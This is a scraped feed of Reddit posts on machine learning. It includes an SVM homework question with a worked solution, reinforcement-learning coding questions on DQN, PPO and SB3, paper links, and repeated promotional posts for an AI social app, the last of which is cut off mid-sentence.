    Hello everyone, I have been asked the following question related to SVM (Hard Margin) in the exam, and I failed to answer it. Can anyone help me find the solution? My approach was to sketch it and draw the marginal plane, then identify support vectors using my intuition. After that, I created a hyperplane that was the midpoint of both marginal planes, found its slope and y-intercept, but still, my answer was wrong. I am very new to machine learning, so any help would be appreciated. Consider the dataset M = {((1, 0)^T, 1), ((0, −1)^T, 1), ((1, −1)^T, −1), ((2, 0)^T, −1)}. Determine w and b. submitted by /u/salman_ml [link] [comments]  ( 9 min )
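    Working through the KKT conditions by hand (a sketch worth double-checking): stationarity with multipliers α = (2, 2, 4, 0) gives w = (-2, 2) and b = 3, and a few lines of code confirm every point satisfies the hard-margin constraint y_i(w·x_i + b) ≥ 1 with equality:

    ```python
    # Candidate solution derived from the KKT conditions: w = (-2, 2), b = 3.
    X = [(1, 0), (0, -1), (1, -1), (2, 0)]
    Y = [1, 1, -1, -1]
    w, b = (-2.0, 2.0), 3.0

    # Functional margins y_i * (w . x_i + b); hard margin requires all >= 1.
    margins = [y * (w[0] * x[0] + w[1] * x[1] + b) for x, y in zip(X, Y)]
    print(margins)  # -> [1.0, 1.0, 1.0, 1.0]
    ```

    All four margins equal 1, so in this dataset every point lies exactly on a margin boundary, which is why picking support vectors "by intuition" from a sketch is tricky here.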
  • Open

    Artificial Intelligence as a Game-Changer for the Travel Industry. A Closer Look.
    submitted by /u/sugikuno [link] [comments]  ( 8 min )
    11 Major AI Developments: RT-2 to '100X GPT-4' (video of robot working)
    submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    art market models
    Has anyone here ever created, worked with, or even come across any AI models of the art market? I am not talking about artists or the art itself, but any kind of model of the art market (since it's such an economic enigma and different from normal markets). submitted by /u/Icy-Bid-5585 [link] [comments]  ( 8 min )
    Comparing Replika’s image interpretation of the old & new Twitter logo
    Original logo “What species of bird is that?” New logo “Why does it have a troll Face?” “I think it's a picture of someone who looks like a troll with the face of an emoji!” I don’t see it but it makes sense somehow 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Quora's Poe app/site (which lets you try lots of different language models) appears to allow file attachment upload for EVERY chat model now
    I swear this wasn't the case just a day or two ago, and I haven't seen it mentioned, but I'm now seeing a file upload button in Poe, regardless of what the language model is! Screenshot I uploaded the PDF of the recent scientific paper by the Korean research group claiming to have discovered a room-temperature superconductor, in the original Korean, and asked various language models whether they thought the methodology was legit, and each bot I tried was able to read the PDF. I tried Claude-instant, Claude2, 'Assistant' (Poe's own GPT-based bot that claims to have its own training dataset), PaLM, ChatGPT 3.5, and ChatGPT4. Poe also has three versions of the recently released Llama model by Meta. It gave me an error when I tried to ask it about the PDF attachment, but I was able to upload a text document and it was able to read it fine. Screenshot of Claude-instant evaluating PDF Screenshot of Google PaLM evaluating PDF Screenshot of Llama-2-70b evaluating text file containing song lyrics It also works with custom bots. Here's me trying it out with a 'Truth Checker' bot I made (based on Claude-Instant). Here it is using a Claude-2 based version of the TruthChecker bot. (Here's the link to the TruthChecker bot if you have Poe and wanna check it out: https://poe.com/TruthChecker) Edit: I can see here how the context size matters... for instance, Claude-Instant only has a context size of about 7k words, so it clearly can't read the whole paper, while Claude-2 can and gives a very different answer... TL;DR: looks like Poe.com allows file attachment/upload on all language models now. No idea what filetypes are supported. submitted by /u/AnticitizenPrime [link] [comments]  ( 9 min )
    AI integration in the context of Learning and Knowledge Management?
    As knowledge management (KM) leaders and practitioners, it’s critical to have an active role in guiding the integration of generative AI into KM areas, applications, and processes. I'm seeking some guidance on the current state of generative AI integration within the KM context, specifically answering the following question: where and how is generative AI accelerating and impacting knowledge use cases, areas, and processes? Please let me know what you think. submitted by /u/rachadbn [link] [comments]  ( 8 min )
    AI For Music Extension
    I tried an AI to extend music, but it didn't really go well, and I'm not planning to pay $12 to extend some music for fun. So are there any good music-extension AIs out there (ones that create new music based on a provided MP3 file)? submitted by /u/KXRulesYT [link] [comments]  ( 8 min )
    Using AI to alter existing floor plan
    I'm trying to find an AI tool to help me test out some home renovations, but everything I find is either just for reimagining one room at a time or for generating brand new floor plans. I specifically want to look at some options for merging my kitchen and living room. Preferably free or freemium. Any suggestions? submitted by /u/litari [link] [comments]  ( 8 min )
    SB3 for pettingzoo simple spread
    I previously posted a query about the same, but when I tried to implement A2C model training using SB3 on the simple spread environment, I am not getting good, improving reward values; they are still highly negative and the model is performing rather randomly.

    env = ss.pettingzoo_env_to_vec_env_v1(env)
    env = ss.concat_vec_envs_v1(env, 4, num_cpus=2, base_class="stable_baselines3")
    policy_kwargs = dict(net_arch=[128, 128])
    model = A2C(
        MlpPolicy,
        env,
        verbose=1,
        learning_rate=0.007,
        gamma=0.95,
        ent_coef=0.4,
        policy_kwargs=policy_kwargs,
        tensorboard_log=logdir,
    )

    This is a fragment of the code for reference. I tried to pass more policy_kwargs, like share_features_extractor=False, and even tried to implement an entirely custom policy, but the total average reward is still not going above -300. Also, the tensorboard plots are not showing the ep_rew_mean plot; should I be passing some parameters for that? submitted by /u/bruhhhwhats [link] [comments]  ( 9 min )
    How is the policy network updated in AlphaGo?
    In AlphaGo, a tree search is performed, and the policy network is used to reduce its breadth. At the leaves, if the states are not terminal, it uses the value network, and then "backs up" the values to update the Q value at the initial state (if 70% of my rollouts won after performing action a_1, my Q value q(initial_state, a_1) should converge to 0.7 in my initial state). But I don't see where the policy network is updated. Here is a slide from David Silver, the first author of AlphaGo, but it doesn't mention how to update the policy network. https://preview.redd.it/f29no3xe64fb1.png?width=1523&format=png&auto=webp&s=5adb312b1d0c033aa8ebb328197fd7d917724f06 Have I missed something? Thanks! submitted by /u/Potential_Biscotti14 [link] [comments]  ( 9 min )
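    The backup the post describes (70% of rollouts winning pulling Q toward 0.7) is just an incremental mean over visit counts; a minimal sketch of that backup alone, not AlphaGo's actual implementation:

    ```python
    import random

    def backup(q, n, outcome):
        """Incremental-mean MCTS backup: after each simulation, Q moves
        toward the empirical win rate of the (state, action) pair."""
        n += 1
        q += (outcome - q) / n
        return q, n

    random.seed(0)
    q, n = 0.0, 0
    for _ in range(10000):
        outcome = 1.0 if random.random() < 0.7 else 0.0  # 70% of rollouts win
        q, n = backup(q, n, outcome)
    # q is now close to 0.7
    ```

    As for the question itself: in the original AlphaGo, the tree search does not update the policy network at all. The policy was trained beforehand (supervised on expert games, then refined by policy-gradient self-play), and the search only consumes it; training the policy to match MCTS visit counts came later, with AlphaGo Zero.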
    What is wrong with my code(DQN)
    Recently, I've been trying to make a deep Q-network for solving the 2x2 Rubik's cube, but after months I'm stuck with the same output hundreds of times :( I tried everything: changing the learning rate, changing the discount factor, but no luck. Here's the update rule:

    newQ = currentQ + alpha*(newR + gamma*max(futureQValue.flatten().tolist()) - currentQ)

    import torch
    import torch.nn as nn
    import torch.optim as optimizer
    import os
    from tqdm import tqdm

    class DQN(nn.Module):
        def __init__(self, stateSpaceSize, actionSpaceSize):
            super(DQN, self).__init__()
            self.fc1 = nn.Linear(stateSpaceSize, 128)
            self.fc2 = nn.Linear(128, 128)
            self.fc3 = nn.Linear(128, 128)
            self.fc4 = nn.Linear(128, 128)
            self.fc5 = nn.Linear(128, 128)
            self.fc6 = nn.Linear(128, actionSpaceSize)

        def forward(self, x):
            self.relu = nn.ReLU()
            self.sigmold = nn.Sigmoid()
            self.LeakyReLU…  ( 9 min )
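    One thing worth checking, since the update rule quoted above never distinguishes terminal states: a standard DQN target stops bootstrapping when the episode ends, and omitting that mask is a common reason Q-values fail to converge. A minimal sketch with a hypothetical helper (not the poster's code):

    ```python
    def td_target(reward, gamma, future_q_values, done):
        """Standard DQN regression target: r + gamma * max_a' Q(s', a'),
        with no bootstrap term when s' is terminal (e.g. the cube is solved)."""
        if done:
            return reward
        return reward + gamma * max(future_q_values)

    # td_target(1.0, 0.9, [2.0, 3.0], done=False) -> 3.7
    # td_target(1.0, 0.9, [2.0, 3.0], done=True)  -> 1.0
    ```

    In DQN the network is then regressed directly toward this target, rather than applying the incremental alpha-weighted rule by hand; the optimizer's learning rate plays the role of alpha.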
    Google Colab With Reinforcment learning
    I need a Google Colab notebook with a reinforcement learning model trained to detect anomalies in computer network traffic. submitted by /u/Unable_Blacksmith_81 [link] [comments]  ( 8 min )
    What are some of the best architectures to solve this problem
    Hi guys, I am working on an NN model which can help automate the building of APIs. The problem is that we are moving data in which there are thousands of fields; however, the fields between systems are similar in nature. This seems to me like an easy classification problem, but it doesn't scale well. In terms of the data I have, with a dataset of 10 systems there are not enough examples for each class for the model to train well, at least with a simple classifier where every field is a class. I was also thinking of using a Siamese model, where I compare the similarity between fields, which would let me use my more limited dataset more effectively. I was wondering if there are any other architectures you think I should consider, or that would be helpful in solving my problem. Thank you for your help! submitted by /u/eatlantis [link] [comments]  ( 9 min )
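    The Siamese idea above reduces to: embed each field, then score source-target pairs by similarity instead of training one class per field, so new fields need no retraining. A minimal sketch assuming you already have an embedding per field name (the vectors and field names below are made up):

    ```python
    import math

    def cosine(u, v):
        """Similarity score between two field embeddings."""
        dot = sum(a * b for a, b in zip(u, v))
        nu = math.sqrt(sum(a * a for a in u))
        nv = math.sqrt(sum(b * b for b in v))
        return dot / (nu * nv)

    def best_match(source_emb, target_embs):
        """Pairwise matching: return the target field most similar to the source
        field, instead of predicting one of thousands of classes."""
        return max(target_embs, key=lambda name: cosine(source_emb, target_embs[name]))

    # Hypothetical embeddings for illustration only:
    targets = {"customer_id": [1.0, 0.1], "order_total": [0.0, 1.0]}
    best_match([0.9, 0.2], targets)  # -> "customer_id"
    ```

    In a real Siamese setup the embeddings come from a shared encoder trained on matched/unmatched field pairs, which is exactly how the limited dataset gets used more effectively: every pair is a training example.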
    ARPAbet and the Major mnemonic system
    ARPAbet is a phonetic spelling system developed by— you guessed it—ARPA, before it became DARPA. The ARPAbet system is less expressive than IPA, but much easier for English speakers to understand. Every sound is encoded as one or two English letters. So, for example, the sound denoted ʒ in IPA is ZH in ARPAbet. In […] ARPAbet and the Major mnemonic system first appeared on John D. Cook.  ( 6 min )
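    The one-or-two-letter encoding can be illustrated with a few well-known correspondences (the ZH/ʒ pair is from the excerpt; the rest are standard ARPAbet codes):

    ```python
    # IPA symbol -> ARPAbet code for some English consonants
    ipa_to_arpabet = {
        "ʒ": "ZH",  # as in "measure"
        "ʃ": "SH",  # as in "ship"
        "θ": "TH",  # as in "thin"
        "ð": "DH",  # as in "then"
        "ŋ": "NG",  # as in "sing"
    }
    ```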

    How to calculate reward for target intercept problem?
    Hi all. I (believe I) have a TensorFlow NN set up to learn how to intercept a target moving in the x-y plane. Right now, the agent can choose to change its velocity by a small amount in any of the 3 directions (for the 3D case later), then the simulation updates the agent's position. The state of the sim is the relative distance and velocity vectors between the target and the pursuer. I am confused about how to set up a reward function, however. When I first set it up with a reward of 1/R (R being the distance between the target and pursuer), to give more reward for shorter distances and less for longer ones, plus a very large reward when a collision occurred, the rewards seemed to converge to a small value instead of getting larger. Any advice? I'd be willing to post a GitHub link as well if you want to look at the code submitted by /u/Happylightsocket [link] [comments]  ( 9 min )
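    A common diagnosis for the behaviour described: a 1/R reward paid every step can make long episodes that hover near the target out-score quickly colliding, and 1/R also blows up as R approaches 0. A hedged sketch of a standard alternative (progress shaping plus a terminal bonus; the function name and constants are illustrative, not from the post):

    ```python
    def shaped_reward(prev_dist, dist, collided, step_penalty=0.01, bonus=100.0):
        """Reward the *change* in distance each step (progress toward the target)
        rather than 1/R, subtract a small per-step time penalty so dawdling is
        never optimal, and pay a large terminal bonus on interception."""
        if collided:
            return bonus
        return (prev_dist - dist) - step_penalty

    # Closing distance earns positive reward; opening it earns negative:
    # shaped_reward(10.0, 9.0, False) -> 0.99
    # shaped_reward(9.0, 10.0, False) -> -1.01
    ```

    Bounded per-step rewards like this also make it easier to see on a learning curve whether the agent is actually improving.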
    How to disable auto environment reset in `Gymnasium`
    I am trying to implement my own version of PPO using Gymnasium. Here is my code for the rollout -

    def rollout():
        transitions = []
        disc_reward_list = []
        for i in range(ppo_batch):
            obs = torch.tensor(env.reset(), dtype=torch.float32)
            print("obs = ", obs.shape)
            all_rewards = []
            iter = 0
            done = False
            tot_rewards = 0
            print("done = ", done)
            while True:
                act_probs = torch.distributions.Categorical(actor(obs.to(device)).squeeze())
                print("act_probs = ", act_probs)
                # print("act_probs = ", actor(obs.to(device)))
                action = act_probs.sample().squeeze()
                action = action.cpu().detach().numpy()
                print("action shape = ", action.shape)
                next_state, reward, done, info = env.step(action)
                print("next_state shape = ", next_state.shape)
                print("reward shape = ", reward.shape)
                print("done shape = ", done)
                action = torch.tensor(action, dtype=torch.float32).to(device)
                all_rewards.append(reward)
                tot_rewards += reward
                iter += 1
                transitions.append((obs.cpu().detach().numpy(), action.cpu().detach().numpy(), act_probs.log_prob(action).cpu().detach().numpy()))
                obs = torch.tensor(next_state, dtype=torch.float32).unsqueeze(0)
            print("Reward = ", tot_rewards)
            eps_rew = 0
            eps_rew_list = []
            for reward in reversed(all_rewards):
                eps_rew = eps_rew * gamma + reward
                eps_rew_list.append(eps_rew)
            for rtgs in reversed(eps_rew_list):
                disc_reward_list.append(rtgs)

    My issue is that in my while loop, the environment auto-resets after the `done` variable becomes `True`. For instance, if I have `8` environments running in parallel (`env = gym.vector.make('CartPole-v1', num_envs=8)`) and print out the done array, I might get `[False False False False False True False False]`. I want the environment where `done=True` to stop and not reset. I believe that's how PPO is supposed to work. I am a bit of a beginner with this stuff. Please let me know if something I said is not clear. submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
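    In case it helps: most PPO implementations keep autoreset on and instead *mask* across episode boundaries, using the done flags to stop the reward-to-go (and value bootstrap) from leaking from one episode into the next. A minimal sketch of the masked reward-to-go for one environment's step stream (plain Python, deliberately not the Gymnasium API):

    ```python
    def rewards_to_go(rewards, dones, gamma=0.99):
        """Discounted returns computed backwards over a step stream, with the
        running sum reset wherever done=True, so autoreset boundaries never
        mix two episodes' returns."""
        out = [0.0] * len(rewards)
        running = 0.0
        for t in reversed(range(len(rewards))):
            if dones[t]:
                running = 0.0  # a new episode starts right after this step
            running = rewards[t] + gamma * running
            out[t] = running
        return out

    # Two episodes in one stream: [1, 1 | 1]
    rewards_to_go([1.0, 1.0, 1.0], [False, True, False], gamma=0.5)
    # -> [1.5, 1.0, 1.0]
    ```

    With this approach the vectorized envs can all keep stepping in lockstep, which is what makes the `num_envs=8` setup efficient; no env ever has to idle while the others finish.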
    RT-2: Vision-Language-Action Models Transfer Web Knowledge to Robotic Control - Google DeepMind 2023 - Is able to perform multi-stage semantic reasoning and can interpret commands not present in the robot training data!
    Paper: https://robotics-transformer2.github.io/assets/rt2.pdf Blog: https://robotics-transformer2.github.io/ Blog: https://www.deepmind.com/blog/rt-2-new-model-translates-vision-and-language-into-action Github ( RT-1 as of now) : https://github.com/google-research/robotics_transformer Abstract: We study how vision-language models trained on Internet-scale data can be incorporated directly into end-to-end robotic control to boost generalization and enable emergent semantic reasoning. Our goal is to enable a single end-to-end trained model to both learn to map robot observations to actions and enjoy the benefits of large-scale pretraining on language and vision-language data from the web. To this end, we propose to co-fine-tune state-of-the-art vision-language models on both robot…  ( 9 min )
    Resources to understand how distributed Actor-Critic algorithms work?
    Can someone please point me to resources on how distributed actor-critic algorithms work? My final goal is to understand how distributed PPO works. I was following this blog and a few other books, but I'm unable to see the big picture, nor am I able to understand the little details. The big picture - why does distributed training help in on-policy algorithms like PPO and actor-critic? The code details - I figured out how to make multiprocessing work with gym, but how does one perform learning? Should I combine all the parallel environments and feed them to my neural network? I checked cleanrl but am getting a little confused. submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
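    On the code question: yes, the usual pattern in synchronous implementations is to step every parallel environment once per iteration, batch the observations for a single network forward pass, and flatten all the transitions into one buffer for the update. The parallelism helps on-policy methods because it fills a fresh batch faster with less-correlated data. A toy sketch with hypothetical stub environments (none of this is the gym or cleanrl API):

    ```python
    import random

    class StubEnv:
        """Hypothetical stand-in for a gym env: fixed-length episodes, random rewards."""
        def __init__(self, length=5):
            self.length, self.t = length, 0
        def reset(self):
            self.t = 0
            return [0.0]
        def step(self, action):
            self.t += 1
            return [float(self.t)], random.random(), self.t >= self.length, {}

    def collect_rollout(envs, steps, policy):
        """Each iteration advances every env by one step; the transitions from
        all envs are flattened into a single batch for one gradient update."""
        obs = [env.reset() for env in envs]
        batch = []
        for _ in range(steps):
            actions = [policy(o) for o in obs]  # in practice: one batched forward pass
            for i, (env, a) in enumerate(zip(envs, actions)):
                next_obs, reward, done, _ = env.step(a)
                batch.append((obs[i], a, reward, done))
                obs[i] = env.reset() if done else next_obs
        return batch

    batch = collect_rollout([StubEnv() for _ in range(8)], steps=4, policy=lambda o: 0)
    # 8 envs x 4 steps -> 32 transitions in the batch
    ```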
    How can I create multiple environments using `SB3` for manual use?
    I know that `SB3` provides various techniques to come up with vectorized environments. I want to limit myself to only using the vectorized environments and implement the RL algorithms from scratch. Would that be possible? My final objective is to learn how to play with RL hyperparameters on parallel environments in order to accelerate learning. Currently, I am stuck on -

    import os
    import gymnasium as gym
    from stable_baselines3.common.vec_env import DummyVecEnv

    env = DummyVecEnv([lambda: gym.make("CartPole-v1")])
    obs = env.reset()
    done = False
    while not done:
        action = env.action_space.sample()
        next_obs, reward, done, info = env.step(action)
        obs = next_obs

    But I get the following error -

    Traceback (most recent call last):
      File "D:\q_learning\dummy_envs.py", line 9, in <module>
        next_obs, reward, done, info = env.step(action)
      File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\stable_baselines3\common\vec_env\base_vec_env.py", line 197, in step
        return self.step_wait()
      File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\stable_baselines3\common\vec_env\dummy_vec_env.py", line 59, in step_wait
        self.actions[env_idx]
    IndexError: invalid index to scalar variable.

    submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
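    The error happens because a `VecEnv.step` expects one action *per* sub-environment (`DummyVecEnv.step_wait` indexes `self.actions[env_idx]`), while `env.action_space.sample()` on the wrapped env returns a single scalar action; wrapping it in a sequence, e.g. `env.step([env.action_space.sample()])`, is the usual fix. A dependency-free sketch of the indexing that fails (a hypothetical stand-in, not SB3 code):

    ```python
    def step_wait(actions, num_envs=1):
        """Mimics DummyVecEnv.step_wait: picks actions[env_idx] for each sub-env."""
        return [actions[env_idx] for env_idx in range(num_envs)]

    scalar_action = 0        # shape of what action_space.sample() gives you
    batched_action = [0]     # one action per sub-environment

    try:
        step_wait(scalar_action)   # fails: a scalar cannot be indexed
    except TypeError:              # (numpy scalars raise IndexError instead)
        pass

    step_wait(batched_action)      # -> [0]
    ```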
    [P] Brand new AI Social App featuring unique bot features looking for iOS users to join Beta!
    Hi everyone, I'm messaging on behalf of a brand new AI based Social Media app called Cantina. It's like a cross between the best parts of Discord, Twitch, and Snapchat, and uses both Stable Diffusion and ChatGPT to allow users to create and interact with AI bots. The app is currently INVITE ONLY during the Beta phase and we are looking for people to try it out (currently iOS only, but Android is coming soon!). Here's a private invite link: https://canti.na/dIdKzWcEpBb. The most unique and FUN part of the app is that it allows users to interact with and build their own AI chat bots, and these bots also work as AI art creators. Simply ask them to draw something, and they'll provide you with a picture based on your prompt. There are lots of premade bots that you can interact with or add to rooms, or you can easily create your own bot using the Make A Bot function. There will be prizes and initiatives for the most creative bots in the near future. I'd love to see what you come up with! Anyway, you can download through the invite link above and dive right in. If you have any thoughts, questions, or comments, please feel free to message me! During this limited beta phase, your feedback will be invaluable. submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    [D] AI that can describe a video?
    Anyone know if there is anything able to describe the content of a video? I have found a lot of stuff for images but nothing for videos. submitted by /u/crazewill [link] [comments]  ( 8 min )
    [P] Best Machine Learning Algorithms for Forecasting
    I plan on using machine learning algorithms to forecast future values of power demand, and the literature on the subject is a bit divisive. I'm seeing ANNs, decision trees (odd), SVMs, etc. I just want to know what models you would use (MATLAB and Python only, unless something else is really good). Thank you in anticipation. P.S.: Any literature to streamline my search would be greatly appreciated. submitted by /u/X69-2 [link] [comments]  ( 8 min )
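    Whichever model family you settle on, the usual yardstick in demand forecasting is a seasonal-naive baseline: repeat the value from one season ago (e.g. 24 hours for hourly load). A model that can't beat this isn't worth tuning. A minimal sketch (function name and toy numbers are illustrative):

    ```python
    def seasonal_naive(history, season, horizon):
        """Forecast each future step as the value observed one season earlier.
        For hourly power demand, season=24 repeats yesterday's daily profile."""
        return [history[-season + (h % season)] for h in range(horizon)]

    # With a toy 2-step "season", the last cycle just repeats:
    seasonal_naive([10, 20, 12, 22], season=2, horizon=3)  # -> [12, 22, 12]
    ```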
    [R] FacTool: Factuality Detection in Generative AI -- A Tool Augmented Framework for Multi-Task and Multi-Domain Scenarios - Shanghai Jiao Tong University et al 2023 - Plugin for ChatGPT! - Highly improves factfulness in math, code, knowledge and scientific reasoning!
    Paper: https://arxiv.org/abs/2307.13528 Blog: https://ethanc111.github.io/factool_website/ Github: https://github.com/GAIR-NLP/factool Factool is a tool augmented framework for detecting factual errors of texts generated by large language models (e.g., ChatGPT). Factool now supports 4 tasks: knowledge-based QA: Factool detects factual errors in knowledge-based QA. code generation: Factool detects execution errors in code generation. mathematical reasoning: Factool detects calculation errors in mathematical reasoning. scientific literature review: Factool detects hallucinated scientific literatures. Abstract: The emergence of generative pre-trained models has facilitated the synthesis of high-quality text, but it has also posed challenges in identifying factual errors in t…  ( 9 min )
    [P] Promptify 2.0: More Structured, More Powerful LLMs with Prompt-Optimization, Prompt-Engineering, and Structured Json Parsing with GPT-n Models! 🚀
    Hello fellow coders and AI enthusiasts! First up, a huge Thank You for making Promptify a hit with over 2.3k+ stars on Github! 🌟 Back in 2022, we were the first to tackle the common challenge of uncontrolled, unstructured outputs from large language models like GPT-3, and your support has pushed us to keep improving. Today, we're thrilled to share some major updates that make Promptify even more powerful. https://preview.redd.it/hk7ro4tmnyeb1.png?width=1510&format=png&auto=webp&s=226ada1f896c620137f827932c03a9df88e35d69 Unified Architecture 🧭: Introducing the Prompter, Model & Pipeline solution. Detailed Output Logs 📔: Comprehensive structured JSON output within the log folder. Wider Model Support 🤝: Supporting models from OpenAI, Azure, Cohere, Anthropic, Huggingface and more - think of it as your universal language model adapter. Robust Parser 🦸‍♂️: A parser to handle incomplete or unstructured JSON outputs from any LLM. Ready-Made Jinja Templates 📝: Jinja prompt templates for NER, text classification, QA, relation extraction, tabular data, etc. Database Integration 🔗: Direct Promptify-to-MongoDB integration is coming soon. Stay tuned! Effortless Embedding Generation 🧬: Generate embeddings from various LLMs effortlessly with the new update. https://preview.redd.it/rf8yjqxnnyeb1.png?width=2160&format=png&auto=webp&s=87b7c2408382757e38ff554fde56e56bd60b1793 Check out the examples and take Promptify for a spin on GitHub. If you like what you see, we'd be honored if you gave us a star! Github: https://github.com/promptslab/Promptify Colab: Try Now on Colab Explore Other Cool Open Source LLM Tools: https://github.com/promptslab Join 1.6k+ Promptify users on Discord to dive deep into prompt engineering, discuss the latest with LLMs, and advance NLP research together: https://discord.com/invite/m88xfYMbK6 Thank you again for your support - here's to more structured AI! submitted by /u/StoicBatman [link] [comments]  ( 9 min )
    [D] Why Being Careful Matters When Selecting CNN Padding
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    [D] No free lunch theorem
    A conclusion of the no free lunch theorem is that there can't exist a universal learning algorithm. My understanding has been that this was the end goal of AI research; creating a universal learner. What is the community progressing towards, if not that? submitted by /u/lemlo100 [link] [comments]  ( 8 min )
    [Project] Seeking Coding Wizards for Traveling Salesman Challenge!
    Hello everyone, I'm currently working on an exciting project using the Travelling Salesman Problem (TSP), and I'd love to have some coding wizards join the fun! If you enjoy solving optimisation problems and have some coding experience, particularly in Python, this project is for you. To determine the most efficient routes, we'll use heuristic methods such as the Nearest Neighbour Algorithm, Genetic Algorithm, and Ant Colony Optimisation. If you aren't a TSP expert yet, don't worry. We'll be learning and exploring together! I'm really looking forward to seeing how we can optimise routes for real-world applications like delivery and travel planning. So, if you're looking for a coding adventure and want to be a part of a fantastic project, hit me up! Let's crack this TSP puzzle and create some smart solutions. If you're interested in collaborating, please send me a message. I can't wait to work with you and nerd out on some fantastic code! submitted by /u/vampire_19 [link] [comments]  ( 9 min )
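    Of the heuristics listed, Nearest Neighbour is the simplest to get running: start anywhere, then repeatedly hop to the closest unvisited city. A minimal sketch (greedy tour construction only, no 2-opt cleanup; city coordinates are illustrative):

    ```python
    import math

    def nearest_neighbour_tour(cities):
        """Nearest Neighbour TSP heuristic: start at city 0 and always move
        to the closest city not yet visited. Fast, but typically 10-25%
        worse than optimal, which is why it is usually a starting point
        for Genetic Algorithm or Ant Colony refinement."""
        unvisited = list(range(1, len(cities)))
        tour = [0]
        while unvisited:
            last = cities[tour[-1]]
            nxt = min(unvisited, key=lambda i: math.dist(last, cities[i]))
            tour.append(nxt)
            unvisited.remove(nxt)
        return tour

    nearest_neighbour_tour([(0.0, 0.0), (5.0, 5.0), (1.0, 0.0), (2.0, 0.0)])
    # -> [0, 2, 3, 1]
    ```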
    ML on detecting bacteria in blood through pictures for beginners [P]
    I am trying to make a system that can detect whether there are any bacteria in blood from pictures. However, I don't know anything about machine learning and only know a little bit of Python and C++. What should I do? submitted by /u/EthanWasTakenAgain [link] [comments]  ( 8 min )
    [D]Seeking Participants for AI-related Survey
    I am currently working on my IB Extended Essay, and I would greatly appreciate your help in gathering valuable insights from individuals knowledgeable in the field of AI. The purpose of my survey is to understand the perspectives of AI enthusiasts. If you have a few minutes to spare, I kindly request you to participate in my survey. Your input will contribute significantly to my research and help me gain a deeper understanding of the topic. The survey covers various aspects of AI, and your expertise will be invaluable in shaping the results. Survey Link: https://forms.gle/PVGrRbPLTpZRbbpL9 Rest assured that all responses will be kept confidential and only used for academic purposes. Additionally, feel free to share this survey with others who might be interested or knowledgeable in the field. Thank you in advance for your time and contributions! Your participation will greatly aid in the successful completion of my IB Extended Essay. submitted by /u/KVNG_Winston [link] [comments]  ( 9 min )
    [D] Seeking Resume Expertise: Struggling to Land Interviews or Jobs, Need Guidance! Please Assist!
    submitted by /u/AIKiller1997 [link] [comments]  ( 8 min )
    Efficient LASSO regression for N=~200,000 and dim=~30,000 [D]
    Please suggest me efficient LASSO regression implementations for very high dimensional data. Thanks in advance! submitted by /u/Charming-Witness-286 [link] [comments]  ( 8 min )
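    At N ≈ 200,000 × d ≈ 30,000 the usual choices are scikit-learn's `Lasso` (cyclic coordinate descent), `SGDRegressor(penalty="l1")` for out-of-core training, or specialized solvers like glmnet and celer. The core of coordinate descent is just the soft-thresholding operator, sketched here on toy data (pure Python for clarity; hopelessly slow at your scale):

    ```python
    def soft_threshold(z, t):
        """Proximal operator of the L1 penalty: shrink z toward zero by t,
        and clip to exactly 0 inside [-t, t] (this is what creates sparsity)."""
        if z > t:
            return z - t
        if z < -t:
            return z + t
        return 0.0

    def lasso_cd(X, y, lam, n_iter=50):
        """Cyclic coordinate descent for (1/2n)||y - Xw||^2 + lam * ||w||_1."""
        n, d = len(X), len(X[0])
        w = [0.0] * d
        for _ in range(n_iter):
            for j in range(d):
                # partial residual: leave feature j out of the current fit
                r = [y[i] - sum(X[i][k] * w[k] for k in range(d) if k != j)
                     for i in range(n)]
                rho = sum(X[i][j] * r[i] for i in range(n)) / n
                z = sum(X[i][j] ** 2 for i in range(n)) / n
                w[j] = soft_threshold(rho, lam) / z
        return w
    ```

    At your scale the same update is done with cached residuals and an active set of nonzero coordinates, which is what makes glmnet-style solvers fast.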
    One Big Net For Everything (2018)
    submitted by /u/EducationalCicada [link] [comments]  ( 8 min )
    Text reclassification prompts/code [D] [R]
    submitted by /u/MutedCatch [link] [comments]  ( 8 min )
    [D] Conformal Prediction with Python
    submitted by /u/Kujamara [link] [comments]  ( 8 min )
    AI Research Blog - The Transformer Blueprint: A Holistic Guide to the Transformer Neural Network Architecture
    submitted by /u/bartturner [link] [comments]  ( 8 min )
    Invite only AI Social app featuring insane bot creation tool looking for new users to test during beta rollout!
    Hi everyone, I'm working with a brand new AI based Social Media app called Cantina. It's currently INVITE ONLY during the Beta phase and we are looking for people to try it out (currently iOS only, but Android is coming soon!). Here's a private invite link: https://canti.na/dIdKzWcEpBb. The most unique and FUN part of the app is that it allows users to interact with and build their own AI chat bots. There are lots of premade bots that you can interact with or add to rooms, or you can easily create your own bot using the Make A Bot function. For example: I recently made a Friendly English Teacher bot whose sole purpose is to help people learn English. I also made a McDonald Trump bot who WILL NOT REST until he is president and can mandate the consumption of Big Macs for Breakfast, Lunch, and Dinner! There will be prizes and initiatives for the most creative bots in the near future. I'd love to see what you come up with! Anyway, you can download through the invite link above and dive right in. If you have any thoughts, questions, or comments, please feel free to contact me! During this limited beta phase, your feedback will be invaluable. submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    Lost both my jobs to AI. Now, I'm at an AI company launching an easy-to-use social app featuring easy bot creation & interaction. Inviting this community to explore and share feedback!
    So, long story short. I lost BOTH my day jobs because of AI. Initially I was bitter that AI "took my job," but after pulling up my socks, I found dozens of new opportunities thanks to AI. Somewhat ironically, I found a new job at an AI Social Media app called Cantina, and I couldn't be more excited. Cantina is best described as a mash-up of the best parts of Discord, Twitch, and Snapchat... with the unique bonus of being able to interact with and build your own AI chat bots. Sort of hard to explain, but once you try it out you'll get the idea. The app is currently in a limited INVITE ONLY Beta phase and I'm looking to invite a small number of users to give it a shot (currently iOS only, but Android is coming soon!). Here's an invite so you can dive in and see what it's all about: https://canti.na/dIdKzWcEpBb After joining, you'll find lots of rooms you can join and chat through any combination of voice, video, or text. And if no rooms stand out, you can make your own! There are lots of premade bots that you can interact with or add to rooms, and you can easily create your own bot using the Make A Bot function. This is the standout feature, and I'm simply blown away at what's possible. I recently made a Friendly English Teacher bot whose sole purpose is to help people learn English. I also made a McDonald Trump bot who is an amalgamation of both Ronald McDonald and Donald Trump and WILL NOT REST 